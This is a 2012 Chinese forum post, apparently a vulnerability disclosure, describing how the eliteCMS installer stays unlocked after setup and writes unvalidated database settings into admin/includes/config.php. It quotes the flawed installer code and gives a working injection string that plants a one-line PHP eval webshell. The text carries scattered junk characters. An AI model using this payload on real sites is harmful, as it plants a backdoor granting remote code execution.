找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2268|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装' ~" l) b9 p" v" h' n6 s
+ u/ k7 D$ v. S! r7 C1 n& N% x* M
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php/ {+ p5 }! U# K
我们来看代码:
) s' c1 L- V+ m# j ; V* k5 `$ |0 W4 o2 I. C
...
% A) ?, g8 j6 c! l' l! Eelseif ($_GET['step'] == "4") {
  g+ p' l6 q$ I/ z    $file = "../admin/includes/config.php";
! M/ c' C+ L: x4 ?2 k    $write = "<?php\n";+ b$ Z5 z- y) D/ F- W2 t
    $write .= "/**\n";9 }4 q- V. {" P2 Z1 h
    $write .= "*\n";5 B5 g7 R; I! Q% U: k8 B
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
: T9 O& K3 I7 D...略...3 S9 K) t8 _7 h8 ?- H
    $write .= "*\n";. J. W0 B$ [- \2 S" l: I
    $write .= "*/\n";) F+ l' ]' k4 X* W# @
    $write .= "\n";1 }1 w: m/ ^, d  y
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
" Y7 a) I: H% e% W4 ^    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";# C" ]  R0 n$ S, }2 `
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";7 h2 T# f5 s( m  s2 X
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";+ R7 `6 f! [' i6 T
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";& H: O* U; z9 @# d% p
    $write .= "if (!\$connection) {\n";, o5 o& f8 i0 L2 P+ O: F
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
1 J  l/ O( M. W8 u    $write .= "        \n";6 n. {; U, _, @( O# W) K/ ~; {
    $write .= "} \n";
& E) t/ l& [# L( `1 ^    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";4 g3 q( L. K" [) f
    $write .= "if (!\$db_select) {\n";2 Q. G' r: ^1 u* x, S) `2 x
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
9 ^! s1 Z$ @+ Y; [    $write .= "        \n";. j: ?5 \  f+ `& K0 a! i, F
    $write .= "} \n";
. a2 _, |; T( m3 U    $write .= "?>\n";7 F( q/ [3 h  J: H0 p, R
; Z. |; K+ d! t4 ?" }
    $writer = fopen($file, 'w');1 c$ b% d# L0 x% [6 @
...( _1 Q2 {( ^! _5 R: {
# _# d3 H; j3 P) C! i& ]
在看代码:5 n' V9 ^- K* r7 u) S
3 m0 l* [/ j9 K& d8 w' {7 r
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
6 _# m1 P: R% H$_SESSION['DB_NAME'] = $_POST['DB_NAME'];8 [8 ^3 ~4 ^/ i
$_SESSION['DB_USER'] = $_POST['DB_USER'];
- {1 s, g% y; y( }: t0 B% w$_SESSION['DB_PASS'] = $_POST['DB_PASS'];/ v- w. Q8 X3 P+ ^, s$ M/ q& [

5 H# t2 F& _6 J5 w) e" e8 Z取值未作任何验证
7 F9 Z, E7 R( H2 m# ^* R如果将数据库名POST数据:1 X/ S4 Y/ r1 Y& A% A0 l
" H, i" e9 O$ u6 @+ {$ G0 J
"?><?php eval($_POST[c]);?><?php# l4 P  |. x# ]: ?: T5 H

7 P* b3 f* x$ j) }将导致一句话后门写入/admin/includes/config.php
, ]. _: i) Y( c$ ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表